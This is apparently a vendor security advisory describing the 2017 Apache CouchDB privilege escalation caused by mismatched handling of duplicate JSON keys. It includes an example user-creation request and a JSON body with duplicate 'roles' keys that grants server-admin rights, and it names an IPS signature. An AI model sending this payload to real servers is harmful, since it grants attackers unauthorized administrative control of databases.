Apache CouchDB JSON Remote Privilege Escalation

December 8, 2017

Apache CouchDB is open source database software that focuses on ease of use and having a scalable architecture. It has a document-oriented NoSQL database architecture and is implemented in the concurrency-oriented language Erlang; it uses JSON to store data, JavaScript as its query language using MapReduce, and HTTP for an API.

A privilege escalation vulnerability exists in CouchDB. The vulnerability is due to a discrepancy in the behaviours of the JavaScript JSON parser, used in design documents, and the Jiffy JSON parser, used within the CouchDB Erlang-based internals. Allowing an attacker to bypass the user access control.

Vulnerability details

CouchDB has its own web interfac for interaction with the REST API. Both interfaces listen on port 5984/TCP by default. The URL for opening its GUI is: http://:5984/_utils

To send an API request, a user will send the following HTTP POST request, carrying the parameters within a JSON file. For example:

PUT /_users/org.couchdb.user:new_user HTTP/1.1
Host: localhost:5984
Content-Type: application/json
Content-Length: 80
{
"type": "user",
"name": "[username]",
"roles": [],
"password": "[password]"
}

When a JSON object has duplicate keys, only the last value will be assigned. For example, the JSON {"key":"value1","key":"value2"} will assign value2 to key. And when CouchDB is handling such an API request, the function validate_doc_update() will be called to verify the current user's privillege. However, CouchDB uses get_value() function which returns only the first value of a given key. And due to the above mentioned JSON rule of handling duplicated key, the last value will be assigned.

{
"type": "user",
"name": "[username]",
"roles": "[_admin]",
"roles": "[]",
"password": "[password]"
}

Such a request will submit a malicious document to the _users or _replicator databases. And escalate the user's privilege to the server admin of CouchDB.

SonicWall Capture Labs Threat Research team has developed the following signature to identify and stop the attacks:

  • IPS 13106: Apache CouchDB JSON Remote Privilege Escalation